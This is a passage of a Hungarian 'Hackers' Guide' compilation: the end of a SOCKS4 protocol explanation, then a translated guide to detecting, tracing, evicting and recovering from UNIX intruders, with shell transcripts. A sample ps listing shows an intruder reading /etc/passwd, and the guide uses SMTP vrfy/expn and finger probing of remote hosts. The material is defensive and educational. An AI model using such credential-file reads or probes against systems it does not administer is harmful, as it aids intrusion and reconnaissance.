93: a kérés elutasítva, mert a kliensprogram és az identd más felhasználói azonosítót mutatnak Az elfogadott kérés esetében a DSTPORT és DSTIP mezoknek jelentésük van, nem úgy, mint a CONNECT esetében, ahol figyelmen kívül hagytuk. Itt a SOCKS szerver létrehoz egy socketet, hogy fogadni tudja a kapcsolatot az alkalmazásszervertol, és az IP-címet és portszámot visszaküldi a kliensnek (a DSTIP és DSTPORT mezokben). Ha a DSTIP mezo a válaszban 0 (az INADDR_ANY konstans értéke), akkor a kliensnek ki kell ezt cserélnie a SOCKS szerver IP-jével, amelyikhez a kliens csatlakozik. Általános esetben ez a két szám a kliens rendelkezésére áll a getsockname() hívás eredményeként. Az alkalmazásprotokollnak biztosítania kell egy módot arra, hogy ezt a két információt a kliens az alkalmazásszerverhez eljuttassa, ezáltal az létrehozhassa a kapcsolatot, és ahelyett hogy a klienshez csatlakozna, a SOCKS szerver megnyitott socket-jéhez csatlakozzon. A SOCKS szerver egy második válaszcsomagot küld a kliensnek, amikor a kapcsolat az alkalmazásszerverrel létrejött. A SOCKS szerver ellenorzi a kapcsolat kezdeményezojének IP-címét, hogy azonos-e a kliens által a BIND-kérésben megadott DSTIP mezovel. Ha nem egyeznek, a második válaszcsomag CD mezoje 91 lesz és a SOCKS szerver mindkét kapcsolatot bontja (tehát a kliens másodlagos kapcsolatát és az alkalmazásszerver frissen létrehozott kapcsolatát). Ha megegyeznek, a második válaszcsomag CD mezoje 90 lesz és a SOCKS szerver felkészül az adatforgalmazás közvetítésére a két kapcsolat között. A kliens innentol kezdve ugyanúgy használhatja a socketet, mintha közvetlenül az alkalmazásszerverhez csatlakozna. A CONNECT és BIND muveleteknek egyaránt idokorlát van meghatározva (2 perc a jelenlegi CSTC implementációban) a SOCKS szerver és az alkalmazásszerver közötti kapcsolatok létrehozására. Ha a kapcsolat az idokorláton belül nem jön létre, a SOCKS szerver lezárja a kapcsolatot a kliens felé és feladja a dolgot. Idáig tartott a protokoll leírása, most pedig lássunk egy egyszerusített példát. Tegyük fel, hogy a kliens IP-címe 10.0.0.1, a SOCKS szerveré 10.0.0.2, és az alkalmazásszerveré 10.0.0.3. A kliens csatlakozni akar az alkalmazásszerver 6667es portjára, a SOCKS szerveren keresztül. A következoket kell tennie: Csatlakozik a 10.0.0.2 SOCKS szerver 1080-as portjára (általában ez a szabvány SOCKS port), és elküldi az alábbi válaszcsomagot: 4 1 26 11 10 0 0 3 65 0 A fent leírt CONNECT-kérésnél ellenorizzük, melyik szám mit jelent; a 65 az ASCII A karakter (felhasználói azonosító); a végén pedig ott a NULL. A szerver ekkor ellenorzi, hogy teljesítheto-e a kérés, esetünkben úgy dönt, hogy teljesítheto, és kapcsolatot létesít a 10.0.0.3 gép 6667-es portjával. Ha sikerült létrehozni a kapcsolatot, válaszcsomagot küld a kliensnek: 0 90 4 10 10 0 0 3 Ezután felkészül a közvetítésre. Ha úgy dönt, hogy a kapcsolatot nem teljesíti, vagy nem hozható létre a kapcsolat az alkalmazásszerverrel, akkor a válaszcsomag elküldése után egybol bontja a kapcsolatot a klienssel.
136
Hackers’ Guide
************************************************************************************************
Betörések felfedezése és kezelése I. Eredeti mû : Practical UNIX & Internet Security Ez a rövidke kis írás azt próbálja leírni majd,hogy milyen lépéseket kell tennünk,ha betörést észleltünk a rendszerünkbe:hogyan fogjuk el a betolakodót;hogyan derítsük ki,hogy milyen károkat okozott;hogyan állítsuk helyre a keletkezõ károkat,ha szükséges.Reméljük,soha nem kell használnod az itt leírt technikákat. Bevezetés Három fõ szabály van arra,hogy hogyan kezeljük a betöréseket. Szabály#1 NE ESS PÁNIKBA! Egy betörés után,számos különbözõ válaszút elõtt állsz.Ne idegeskedj amiatt,ami történt,mert így gondolkodás nélkül olyan dolgokat tehetsz,amelyekkel csak rontassz a helyzeten. Mielõtt bármit is csinálnál,meg kell kérdezned magadtól néhány kérdést,és a válaszokat fejben tartani. - Valóban betörés történt? Az a valami,ami esetleg a betolakodó jelenlétére utal,lehet az eredménye egy software,vagy emberi hibának is. - Valóban történt bárminemû károkozás? Számos sikeres betörésnél a betolakodó ugyan megszerzi a jogosulatlan elérést,de nem nyúl személyes információkhoz,és nem változtatja meg file-ok tartalmát. - Fontos,hogy elérjük,és biztonságba helyezzük a bizonyítékot,amit felhasználunk a késõbbi nyomozás során? - Fontos,hogy a rendszert minél hamarabb visszaállítsuk normál állapotába? - Ki kell derítened,hogy lettek -e file-ok megváltoztatva,vagy törölve? Ha igen,hogyan fogod biztosan megtudni,hogy valóban így történt-e? - Számít,hogy a cég,vagy a rendszer tulaja tud errõl az incidensrõl? És ha egy külsõ személy hall róla? - Megtörténhet újból?
137
Hackers’ Guide
A kérdésekre adoot válaszok egymásnak ellentmondóak is lehetnek,pl : a bizonyíték védelme és a file-ok összehasonlítása a backuppal nem lehetséges,ha a cél a rendszer minél elõbbi üzembehelyezése.Neked kell majd eldöntened,mi a legjobb a site-odnak. Szabály#2 Dokumentálj! Indíts egy logot,azonnal.Fogj egy notebookot,és írj le mindent,amit találsz,és mindig jegyezd le a dátumot,és idõt is.Ha text file-okat vizsgálsz,nyomtass másolatokat,és dátumozd-szignózd.Ha megvan a szükséges disk space,oda is írd ki az egészet a script paranccsal.Ezeket az infokat kézben tartva a késõbbi tanulás jelentõs idõt,és bosszankodást takaríthatunk meg,különösen,ha ha gyorsan vissza kell állítanod,vagy meg kell változtatnod file-okat,hogy visszaállítsd a rendszert. A következõ szekciókban megpróbáljuk leírni a mechanizmust,amit arra tudsz használni,hogy észrevedd a betolakodót,és kezelni tudd a kérdést : mit csináljak,ha felfedeztem,hogy betolakodó van a rendszeremen. Szabály#3 Tervezz elõre! Amikor egy biztonsági probléma adódik,van néhány standard lépés,amiket meg kell tennünk.Ezeket a lépéseket tervezd el elõre,jegyezd le egy papírra,mert betörés esetén nagy a hezitálás és a zûrzavar.Ilyenkor nehéz tiszta fejjel gondolkodni. :) Nagyobb installációknál lehet,hogy szeretnéd gyakorolni ezeket a lépéseket.A következõ alaplépések ott lehetnek a tervedben : Step 1: Azonosítsd és értsd meg a problémát. Ha nem tudod,mi is a probléma pontosan,nem tudsz lépéseket tenni a kiküszöböléshez.Ez nem azt jelenti,hogy tökéletesen kell,hogy megértsd,de legalább a körvonalait lásd a problémának,amivel szembenézel.A hálózati kábel elvágása nem segít rajtad,ha egy bosszúszomjas alkalmazott az irodájából okozta a bajt. Step 2: Tárold vagy állítsd le a károkozást. Ha azonosítottad a fennálló problémát,tegyél azonnali lépéseket a megállítás vagy a korlátozás felé.Abban az esetbet,ha azonosítottad az alkalmazottat,aki system fileokat töröl,biztosan szeretnéd kilõni az acc.-ját,és talán fegyelmi eljárást indítani ellene.Ezek olyan lépések,amelyekkel korlátozni lehet a károkozást a rendszerben,illetve adataiban. Step 3: Bizonyítsd a diagnózist és határozd meg a kárt. Ha sikerült az okozott kárt letárolnod valamilyen formában,bizonyítsd a diagnózist,és határozd meg,milyen kár keletkezett.Tüntek el file-ok,miután az alkalmazottat kilõttük a rendszerbõl? Soha sem lehetsz 100%-ig biztos benne,hogy 2 vagy több incidens összefügg.Ezenkívül nem azonosíthatod az összes okozott kárt minden esetben. Step 4: Állítsd vissza a rendszeredet. Miután megtudtad,milyen méretû kár keletkezett,vissza kell állítanod a rendszert normál állapotba.Ez keverhetõ a rendszer egyes részeinek újraindításával a backupból,vagy jelenthet egy egyszerû system restartot.Mielõtt bármit is tennél,bizonyosodj meg róla,hogy azok a programok,amiket 138
Hackers’ Guide
használsz,"biztonságosak". A támadó felcserélhette a restore programot egy trojannal,ami letörli az összes file-t a HD-n,és a backup szalagon. Step 5: Barátkozz meg a helyzettel. Ha ilyen jellegû probléma adódik,talán szeretnél néhány változtatást és javítást eszközölni a rendszeren,miután az visszaállt normál állapotába.Ha egy olyan személy a bûnös,aki csak valamilyen hibát követett el,és így sebezte meg a rendszert,talán késõbb szeretnél oktatást adni neki,hogy másodszor elkerüld ezt a balesetet.Ha valaki szándékosan okozta a kárt,törvényes eljárást kell indítani ellene. Step 6: Hajtsd végre a szükséges módosításokat,hogy a rendszer biztonságban legyen. Ez nagyon fontos lépés,mivel ha nem hárítjuk el a sechole-t,a probléma a közeljövõben könnyen elõfordulhat mégegyszer.De vigyázzunk,minden módosítást nagy körültekintéssel végezzünk,nehogy nagyobb kárt okozzunk,mint amit maga a betörés okozott. Fordította : Th3NmY
************************************************************************************************
Betörések felfedezése és kezelése II.
A betörõ felfedezése Számos módszer létezik arra,hogy hogyan fedezhetsz fel egy betolakodót : -A támadó rajtakapása munka közben.Pl : szeretnéd megnézni,hogy a superuser egy dial-up terminálról van-e belépve,miközben te vagy az egyetlen személy,aki tudja a superuser passwordot. -Következtetés,hogy egy támadó bent van abból,hogy változtatásokat eszközölt a rendszeren.Pl : kapsz egy e-mailt egy támadótól,aki értesít a sechole-ról,vagy új account-bejegyzéseket találsz a /etc/passwd-ben. (Unix) -Üzenetet kapsz egy system administrator-tól,aki egy másik site-ról furcsa tevékenységet jelez a saját site-járól,amelynek eredete egy olyan account,ami a te rendszereden van. -Furcsa aktivítás a rendszeren,úgymint rendszerösszeomlások,nagy hard disk tevékenység,megmagyarázhatatlan reboot-ok,jelentéktelen accounting ellentmondások,[1] vagy indokolatlanul lassú system response-ok(Egy Crack futhat a rendszeren). 139
Hackers’ Guide
[1] Nézd meg Cliff Stoll - The Cuckoo's Egg írását,amely egy olyan történet,amiben a szerzõ leírja, milyen ellentmondások vezették egy hacker aktivításának leleplezéséhez. Számos parancs létezik,amiket arra használhatsz,hogy felfedezz egy betörést,és néhány kitûnõ package(úgymint Tiger és a Tripwire) is hasonló célt szolgál.Alkalmazd ezeket gyakran,de ne szabályos idõközönként,hanem elszórtan.Ez csökkenti a támadók esélyeit a sikeres betöréshez. Aktivítás közben elfogni a betolakodót A legkönnyebb út ahhoz,hogy elfogjunk egy támadót,hogy olyan eseményeket keresünk,amelyek nem megszokottak a rendszeren. Pl: - Egy user több ízben is loginol.(Sok window system regisztrál egy külön login-t minden window-hoz,amelyet a user nyit meg,de álltalában szokatlan,hogy ugyanaz a user be van loginolva 2 különbözõ dial-in vonalról is ugyanabban az idõben) - Egy user,aki nem programozó,de ennek ellenére egy compilert vagy debuggert futtat - Egy user,aki nagyon keményen,és nem jellemzõen használja a networkot. - Egy user,aki sok dialout hívást indít. - Egy user,akinek nincs modemje,a computerbe dial-in line-ról van loginolva. - Egy személy,aki superuserként hajt végre parancsokat. - Hálózati kapcsolatok elõzõleg ismeretlen gépekrõl,vagy site-okról,amelyek soha nem kapcsolódtak a rendszeredhez. - Egy user,aki login-olva van,miközben vakációzik,vagy munkaidõn kívül van(pl : egy titkárnõ 1:00a.m. -kor dialin - ezett,stb...) A UNIX rendelkezésünkre bocsát egy rakás olyan parancsot,amelyek segíthetnek kitalálni,ki mit csinál a rendszeren.A finger, users, whodo, w és who parancsok egy listát adnak a userekrõl,akik jelenleg loginolva vannak.A ps parancs segít megállapítani,hogy melyik user mit csinál egy adott idõben.A netstat parancs arra használható,hogy leellenõrizzük a hálózati aktivítást. Ha te egy system administrator vagy,már biztosan nagy gyakorlatod van ezeknek a parancsoknak a kiadásában a felhasználói aktivítás ellenõrzésére. Egy idõ után már tudni fogod ,hogy az egyes userek milyen parancsokat szoktak kiadni,így ha valami furcsa dolog történik,közelebbrõl is megnézheted a dolgot. Légy óvatos,mert ezeket a parancsokat meg tudják "bolondítani" azok a betolakodók,akiknek sok tapasztalatuk van.Pl a w,users and finger a /etc/utmp file-t ellenõrzik,hogy ki van jelenleg bejelentkezve.Ha egy támadó töröl,vagy megváltoztat a saját bejegyzését,vagy az egész file-t megváltoztatja,ezek a parancsok nem fogják a támadó jelenlétét jelezni.Ráadásul néhány rendszer nem update-eli ezt a file-t,és néhány window system nem jól update-eli új bejegyzésekkel,szóval nem biztos,hogy ezek a parancsok minden esetben hiteles információt adnak vissza.
140
Hackers’ Guide
A ps parancs megvizsgálja a kernel process-tábláját,egyszóval ez sokkal ellenálóbb az esetleges nem kívánt beavatkozások ellen,mint a /etc/utmp file vizsgálata.Ugyanakkor egy betolakodó akinek már megvan a superuser elérése a rendszereden,módosíthatja a ps parancsot,vagy a code-ot a rendszer hívásokban,amiket használ,így az nem fogja kiírni az álltala futtatott processeket.Egyébként bármely process tudja módosítani az argv argumentumait, megengedve ezzel,hogy azt jelezze ki,amit akar a ps parancs kimenetében.Ha nem hiszed el,amit ezek a parancsok kiírnak,a jó úton haladsz. :) Mit kell tennem,ha valakit elkaptam? Van egy jó pár választási lehetõségünk,hogy mit teszünk a betolakodóval,akit lekapcsoltunk : 1. Nem törõdünk vele. 2. Megpróbálunk kapcsolatba lépni vele a write vagy a talk paranccsal,és megkérdezni,mit akar. 3. Megpróbáljuk nyomkövetni(trace-elni) a connection-t,és azonosítani a támadót 4. Megszakítjuk a connection-t azzal,hogy az álltaluk indított processeket lelõjük; kihúzzuk a modemet,vagy a hálózati csatlakozót,vagy kikapcsoljuk a computert. 5. Kapcsolatba lépünk a FIRST(Forum of Incident Response and Security Teams) team-mal(e.g., the CERT-CC),és jelezzük nekik,hogy támadás ért. Az,hogy mit csinálsz,a te döntésed.Egy támadót figyelmen kívül hagyni a rendszereden nem egy jó megoldás,mert szabad utat kap,hogy molesztálja a systemedet,a userokat,stb... :) Ha a 2. pontot választod,tehát megpróbálsz kapcsolatba lépni vele,mindent logolj ,amit a támadó küld vissza neked,majd döntsd el,melyik ponttal folytatod.... Megjegyzés: Néhány intruder lehet gonosz gondolkodású,vagy pedig nagyon ilyedékeny,amikor rájön,hogy leleplezték.Ha kapcsolatba lépsz velük,lehet,hogy úgy reagálnak,hogy elkezdenek mindent letörölni a disken,hogy eltüntessenek minden nyomot.Ha egy ilyen behatolóval próbálsz kapcsolatba lépni,elõtte legyél biztos benne,hogy az egész rendszerrõl van backupod. Ha a behatoló be van lépve a pc-nkbe a hálózaton keresztül,talán szeretnéd mindenek elõtt a kapcsolatot nyomon követni(trace),mert sokkal könnyebb egy aktív kapcsolatot nyomkövetni,mint egy inaktívat. :) A nyomkövetés után talán szeretnél kommunikálni a támadóval a write vagy a talk parancsokat használva.Ha a behatoló a computeredhez egy fizikai terminálról van kapcsolódva,biztosan szeretnél a terminálhoz menni(fizikailag),és szembesülni illetõvel. Megjegyzés: Kerüld a mail vagy a talk parancs használatát,amivel a távoli site-tal lépünk kapcsolatba,(ha megpróbálod nyomkövetni a kapcsolatot,és megvan a remote host),mert lehet,hogy a remote site accountja is hackelve van.Próbáld a telefont használni ha lehetséges,mielõtt mailt küldessz.Ha mindenképpen egy üzenetet kell küldened,küldj valami ártatlan dolgot, pl : "Fel tudnál hívni? Problémáink vannak a mailer-eddel.". Természetesen,ha valaki hív téged,ellenõrizd,ki az. 141
Hackers’ Guide
A behatoló monitorozása Nyilván szeretnéd monitorozni a támadó aktivítását,hogy kitaláld,mit is csinál éppen.Kíderítheted,hogy éppen az account database-edet módosítja-e,vagy éppen a user-eid mailjei körül kotorászik... Sok dolgot érthetünk a behatoló monitorozása alatt.A legegyszerûbb ,hogy olyan programokat használunk,mint a ps vagy a lastcomm,hogy megnézzük,mely processeket használja az intruder. Az OS-ed típusától függ,hogy tudsz-e olyan programokat használni,mint a ttywatch vagy a snoop,amikkel az intruder billentyû-leütéseit figyelhetjük. Ezek a parancsok részletes információt adnak minden packetrõl,amelyet a hálózatra küldõdik. Ezekkel a részletes infokkal talán könnyebben kideríthetõ,mit is csinál a betolakodó. Pl: # snoop asy8.vineyard.net -> next SMTP C port=1974 asy8.vineyard.net -> next SMTP C port=1974 MAIL FROM: asy8.vineyard.net SMTP R port=1974 250 next SMTP C port=1974 asy8.vineyard.net -> next SMTP C port=1974 RCPT TO: asy8.vineyard.net SMTP R port=1974 250 next SMTP C port=1974 asy8.vineyard.net -> next SMTP C port=1974 DATA\r\n next -> asy8.vineyard.net SMTP R port=1974 354 Enter mail, end Ebben a példában egy email-t fogtunk el,amelyet az asy8.vineyard.net-rõl küldtek a next nevû géphez.Ahogy a fenti példa mutatja,ezek a parancsok részletesen megmutatják,hogy milyen személyek mit csinálnak a rendszeren. Legyél óvatos ezekkel az eszközökkel,mert ezeket ellened is felhasználhatja a támadó,hogy monitorozza a te monitorozásodat.Egyébként megfontolandó ezeknek az eszközöknek a használata másik gépen(mármint nem a kompromittált géprõl),mivel így csökkenthetõ az esélye annak,hogy a behatoló felfedezi,hogy nyomozunk utána. Egy kapcsolat nyomkövetése A ps,w,és who parancsok az összes terminálról reportot kérnek,amelyekhez user van csatolva.Az olyan terminál nevek,mint /dev/tty01 rövidíthetõk simán tty01-re,vagy 01re.Fõként az olyan nevek,mint tty01,ttya vagy tty4a reprezentálnak soros fizikai vonalakat,miközben az olyan nevek,amelyek p,q vagy r betût tartalmaznak(mint pl : ttyp1),hálózati kapcsolatra utalnak(virtuális tty-ok,vagy más néven pszeudoterminálok,vagy pty-ok) Ha a támadó telefonvonalon keresztül csatlakozott a rendszerhez,nincs szerencséd.A telefonhívásokat csak a telefontársaság tudja nyomkövetni,és sajnos erre nem könnyû rávenni õket. Viszont sok telefontársaságnak vannak spéci sajátosságaik,úgymint CALL*TRACE és CALLER*ID(CNID),amelyeket használhatóak ugyanûgy modemhívásoknál,mint voice hívásoknál.Ha már beállítottad a service-t,és installáltad a megfelelõ hardware-t,már csak aktiválnod
142
Hackers’ Guide
kell. Akkor elolvashatod az eredményeket... Ha a támadó hálózaton keresztül van loginelve,használhatod a who commandot hogy gyorsan kiderítsd a computer nevét,amelyrõl a személy a kapcsolatot kezdeményezte.Egyszerûen írd be who : % who orpheus console Jul 16 16:01 root tty01 Jul 15 20:32 jason ttyp1 Jul 16 18:43 (robot.ocp.com) devon ttyp2 Jul 16 04:33 (next.cambridge.m) % Ebben a példában az orpheus user van loginelve a konzolról,a root tty01-en (Egy terminál,amely soros vonalon csatlakozik),jason és devon mindketten a hálózaton keresztül vannak beléptetve. A who parancs néhány verziója csak az elsõ 16 karakterét írja ki annak a hostnak,amelyrõl a kapcsolat származtatható(a gépnév egy 16 byte-os mezõben van a /etc/utmp-ben;a UNIX újabb verziói már több karaktert tudnak tárolni).Ahhoz,hogy a komplett hostname-et megtudd,a netstat parancsot kell használnod.Ha a behatoló törölte,vagy módosította a /etc/utmp filet,szintén ezt a parancsot kell használnunk a támadó eredetének kiderítésére.Sajnos a netstat parancs nem adja vissza,hogy melyik user melyik network connectionnal hozható kapcsolatba. (Természetesen ha az elsõ 16 karakterét kiderítettük a hostname-nek,könnyen kitalálhatod,melyik melyik,még akkor is,ha a /etc/utmp törölve lett.Arra is használhatód a netstat parancsot,hogy olyan kapcsolatokat keress,amelyek ismeretlen gépektõl származnak.) Szerencsére a UNIX modernebb verziói,beleértve az SVR4-et,már az egész hostnevet tárolják. Tegyük fel,hogy az elõbbi példában Jason egy intruder,mert tudjuk róla,hogy éppen jógagyakorlatokat végez Tibetben (Ahol nincsenek terminálok :).A who és netstat parancsokat használva kideríthetjük,hogy az a személy,aki Jason acc.-jával loginolt ,a kapcsolatot a robot.ocp.com-ról indította.Most használjuk a finger parancsot,hogy kiderítsük,milyen userek vannak a távoli hoston loginelve: % finger @robot.ocp.com [robot.ocp.com] Login Name TTY Idle When olivia Dr. Olivia Layson co 12d Sun 11:59 wonder Wonder Hacker p1 Sun 14:33 % Természetesen ez a metódus nem feltétlenül leplezi le a támadót,mert lehet,hogy csak "átjáróként" (relay point) használja a gépet.A felsõ példában Wonder Hacker ttyp1-be van loginolva,amelyik egy másik virtuális terminál.Õ talán egy másik géprõl jött,és egyszerûen a robot.ocp.com-ot használja relay point-ként.
143
Hackers’ Guide
Ha van accountod a távoli gépen,lépj be,és nézd meg,ki futtat rlogin,vagy telnet parancsot,amelyik a gépedre irányul.Ha találsz ilyet,azonnal lépj kapcsolatba az adott rendszer adminisztrátorával,és figyelmeztesd a problémával kapcsolatban. Egyéb figyelmeztõ jelek Számos egyéb figyelmeztetõ jel létezik,amely egy támadó jelenlétére utalhat a rendszerünkben.Pl felfedezed,hogy azok a shellek olyan terminálokon futnak,amelyekre senki sincs belépve vagy olyan nyitott network connection-öket veszel észre,melyek eredete ismeretlen gépekrõl ered. Légy gyanakvó és kiváncsiskodó! Hogyan lépjünk kapcsolatba olyan computerek adminisztrátoraival,amelyeket nem ismerünk Gyakran elõfordulhat,hogy nem tudod kideríteni a nevét és telefonszámát egy távoli gép rendszeradminisztrátorának,mert a UNIX nem biztosít elõírásszerû felhasználóazonosítási mechanizmust.Jó módszer a telefonszám és email cím kiderítésére a whois parancs használata,amivel a NIC (Network Information Center) adatbázisban kerestethetünk.Ha a rendszereden nincs whois parancs,egyszerûen telnetelj be a NIC site-ra.Alul van egy példa arra,hogyan nyomozzuk ki a nevet és telefonszámot. A NIC karabantart egy adatbázist,amely a fontos network felhasználók neveit,címeit és telefonszámait tartalmazza(álltalában a különbözõ site-ok contact person-jainak adatait is).Ha connectolni tudsz a whois.internic.net-re telneten keresztül,megkaphatod az információt,amire szükséged van.Próbáld ki a következõt : 1. Telnetelj a whois.internic.net-re 2. A promptnál írd be : whois 3. Próbáld meg beírni a robot.ocp.com hostot. Ha szerencséd van,a server a megfelelõ recordot küldi vissza az adatbázisból,amely a contact person adatait tartalmazza. 4. Ha ez nem jött be,próbálkozz az ocp.com-mal. 5. Ha kész,írd be a quit-et a rendszerbõl való kilépéshez. A következõ példa azt mutatja be,hogy hogyan kapjunk információt a whitehouse.gov domainról: % telnet whois.internic.net Trying 198.41.0.6 ... Connected to rs.internic.net. Escape character is `^]'. SunOS UNIX 4.1 (rs1) (ttyp1)
144
Hackers’ Guide
*********************************************************************** * -- InterNIC Registration Services Center -* * For wais, type: WAIS <search string> * For the *original* whois type: WHOIS [search string] * For referral whois type: RWHOIS [search string] * * For user assistance call (703) 742-4777 # Questions/Updates on the whois database to [email protected] * Please report system problems to [email protected] *********************************************************************** Please be advised that use constitutes consent to monitoring (Elec Comm Priv Act, 18 USC 2701-2711) Cmdinter Ver 1.3 Tue Oct 17 21:51:53 1995 EST [xterm] InterNIC > whois Connecting to the rs Database . . . . . . Connected to the rs Database Whois: whitehouse.gov Executive Office of the President USA (WHITEHOUSE-HST) WHITEHOUSE.GOV 198.137.240.100 Whitehouse Public Access (WHITEHOUSE-DOM) WHITEHOUSE.GOV Whois: whitehouse-dom Whitehouse Public Access (WHITEHOUSE-DOM) Executive Office of the President USA Office of Administration Room NEOB 4208 725 17th Street NW Washington, D.C. 20503 Domain Name: WHITEHOUSE.GOV Administrative Contact: Fox, Jack S. (JSF) [email protected] (202) 395-7323 Technical Contact, Zone Contact: Ranum, Marcus J. (MJR) [email protected] (410) 889-6449 Record last updated on 17-Oct-94. Record created on 17-Oct-94. Domain servers in listed order: GATEKEEPER.EOP.GOV 198.137.241.3 ICM1.ICP.NET 192.94.207.66
145
Hackers’ Guide
Whois: quit [xterm] InterNIC > quit Tue Oct 17 21:55:30 1995 EST Connection closed by foreign host. % Ha esetleg ez a módszer nem sikerülne,meg kel próbálni a host ISP-jét felhívni,hátha tudnak contact onformációt mondani.Az ISP-t könnyen kideríthetjük a traceroute paranccsal.Vészhelyzetben a szervezet számát hívjuk(amihez a site tartozik),és kérjük meg a biztonsági õrt,hogy lépjen kapcsolatba a megfelelõ személyekkel. Megpróbálhatjuk esetleg még a finger parancsot alkalmazni a távoli gép rootjára : % finger [email protected] [robot.ocp.com] Login name: root in real life: Joel Wentworth Directory: / Shell: /bin/csh Last login Sat April 14, 1990 on /dev/tty Plan: For information regarding this computer, please contact Joel Wentworth at 301-555-1212 Sajnos elég gyakran használhatatlan információt ad vissza : % finger [email protected] [robot.ocp.com] Login name: root in real life: Operator Directory: / Shell: /bin/csh Last login Mon Dec. 3, 1990 on /dev/console No plan Ebben az esetben meg kell próbálnod kinyomozni,hogy ki a computer adminisztrátora,úgy,hogy kapcsolatba lépünk a site sendmail démonjával,és megpróbáljuk azonosítani,hogy ki kap leveleket a root vagy postmaster mailboxokba. % telnet robot.ocp.com smtp Trying... Connected to robot.ocp.com Escape character is "^]". 220 robot.ocp.com Sendmail NeXT-1.0 (From Sendmail 5.52)/NeXT-1.0 ready at Sun, 2 Dec 90 14:34:08 EST helo mymachine.my.domain.com 250 robot.ocp.com Hello mymachine.my.domain.com, pleased to meet you vrfy postmaster 250 Joel Wentworth <jw> expn root 250 Joel Wentworth <jw> quit 221 robot.ocp.com closing connection Connection closed by foreign host.
146
Hackers’ Guide
Ezekután használhatod finger parancsot,hogy kiderítsd a telefonszámot. Sajnos sok rendszeradminisztrátor kikapcsolja a finger démont,és a sendmail démon nem teljesíti a kérésünket(verify,expand).Ugyanakkor még mindig van esély a contact person azonosítására. Ha minden próbálkozásunk sikertelen,küldhetünk mailt a "postmaster" -nek az adoot gépre,és reménykedhetünk,hogy hamarosan elolvassák....Soha ne említsd meg a betörést az emailben,mert néha a betolakodó monitorozza az emaileket.Ehelyett add meg a nevedet,telefonszámodat,jelezd,hogy a dolog nagyon fontos,és kérd a postmastert,hogy hívjon fel.Természetesen,miután felhívtak,azonnal tudd meg a számot,és próbáld meg visszahívni õket - csak hogy biztos legyél benne,hogy az adminisztrátorral beszélsz(és nem a támadóval,aki törölte a levelünket,mielõtt azt bárki elolvashatta volna).Felveheted a kapcsolatot a FIRST team-ek egyikével is,úgymint a CERT-CC-vel.Nekik van néhány egyéb erõforrásuk,és talán õk el tudnak látni a kellõ contact infokkal. Hogyan szabaduljunk meg a behatolótól? A számítógép kikapcsolása a leggyorsabb mód arra,hogy a támadót kirugdaljuk a géprõl. :) Szerencsétlenségünkre ez a drasztikus akció nem csak a támadót rugdalja ki a géprõl,hanem félbeszakítja a gépünkben folyó összes folyamatot,beleértve a felhasználók munkáit is.Ezzel a bizonyítékot is könnyen eltüntethetjük,amelyre néhány nap múlva a bíróságon nagy szükségünk lehet(pl : futó processek(mailrace,stb)),valamint ez okozhatja a rendszer sérülését is amikor rebootolsz (a trojan startup-scriptek miatt).A UNIX filerendszere nincs megbarátkozva a hirtelen áramellátás megszûnéssel : a tápcsatlakozó kihúzása jóval nagyobb károkat okozhat,mint amilyet a behatoló valaha is tehet. Néhány esetben sikerülhet a támadótól való megszabadulás úgy is,ha egyszerûen megkérjük,hogy hagyja el a rendszerünket.Informáld a támadót,hogy amit csinál az antiszociális és törvényellenes.Néhány számítógépes betörõnek gyerekes motivációi vannak a magántulajdon megsértésére;gyakran nem állnak le gondolkodni a következménykerõl.Ugyanakkor ne fogadj rá,hogy a behatoló primitív azért,mert így viselkedik. Ha az illetõ nem hajlandó elhagyni rendszerünket,ki kell gyilkolni az álltala futtatott processeket a kill parancsot használva. Használd a ps parancsot,hogy megkapd az összes user processeinek process-számát,változtasd meg a hackelt acc. jelszavát,és végül irtsd ki a támadó összes processét. Egy egyszerû példa: # ps -aux USER PID %CPU %MEM VSIZE root 1434 20.1 1.4 968K 224K nasty 147 1.1 1.9 1.02M 304K nasty 321 10.0 8.7 104K 104K nasty 339 8.0 3.7 2.05M 456K ... # passwd nasty Changing password for nasty.
RSIZE 01 R p3 S p3 S p3 S
TT STAT TIME COMMAND 0:00 ps aux 0:07 - (csh) 0:09 cat /etc/passwd 0:09 rogue
147
Hackers’ Guide
New password: rogue32 Retype new password: rogue32 # kill -9 147 321 339 Légy megfontolt a password változtatásnál,mielõtt kinyírod a processeket különösen ha a behatoló rootként van belépve.Ha a felhasználó gyorsabban gépel,mint te,könnyen elõfordulhat hogy letiltja az accodat,mielõtt tudnál róla. :) Tartsd észben,hogy a legtöbb betolakodó installálni fog egy backdoort a rendszerbe.Szóval attól,hogy megváltoztattad a jelszót,még nem biztos,hogy biztonságban vagy : kapcsold a rendszert single-user módba,és ellenõrizd le többször is. Ha már minden kötél szakad,fizikailag is megszakíthatod a kapcsolatot.Ha a behatoló telefonvonalon tárcsázott be,kikapcsolhatod a modemet - vagy kihúzhatod a számítógép hátuljából. Ha a behatoló networkön keresztül jött be,kihúzhatod a hálózati csatlakozót - ugyanakkor ez minden legitim felhasználó kiszolgálását megszakítja.. Amint a támadó eltûnt a gépünkrõl,próbáld meg eldönteni a kár volumenét,és foltozd be a sechole-okat,amik a behatolót beengedték.Ugyanakkor alaposan nézzünk szét,mert könnyen lehet,hogy új sechole-okat nyitott meg,amin késõbb visszajöhet. Egy betörés anatómiája A következõ történet megtörtént esetet dolgoz fel.A nevek és egy pár részlet meg lett változtatva a személyiségi jogok védelme érdekében. :)) Késõ este 1995 Novemberében egy computer konzultáns egy Seattle-i cégnél belépett az egyik gépbe,amelyet alkalmanként használni szokott.A rendszer szokatlanul lassúnak tûnt,így lefuttatta a top parancsot,hogy megtudja,mi az,ami ennyire lelassítja a rendszert.A konzultáns észrevette,hogy egy vs nevû program óriási rendszer-erõforrásokat emészt fel.A program superuserként futott... Valami nem stimmelt...Hogy több információt kapjon,lefuttatta a ps parancsot.Ekkor egyre furcsábbak lettek a dolgok - a misztikus program nem jelent meg a ps álltal visszaadott listában.Mégegyszer megpróbálta a top parancsot futtatni,és lám a vs process még mindig futott... Ekkor villant be a tudatába,hogy ezek egy betörés nyomai lehetnek...Elkezdett hát a filerendszerben körbenézni az Emacs dired parancsát használva,és megtalálta a vs programot a /var/.e könyvtárban.Semmi kétség,a program pontosan itt volt,és még mindig látható volt Emacsból a dired paranccsal. Ekkor már biztos volt benne,hogy valaki betört a rendszerbe.A támadás elég kifinomúltnak tünt.Természetesen nem akarta,hogy a támadó tovább tevékenykedhessen,ezért szerette volna shutdownolni a rendszert.De aggódott amiatt,hogy a támadó booby-trappolta(??) a /etc/halt parancsot,hogy megsemmisítse a betörés nyomait. Ezért mielõtt lelõtte volna a rendszert,használta a tar parancsot,hogy másolatot készítsen a /var/.e könyvtárról 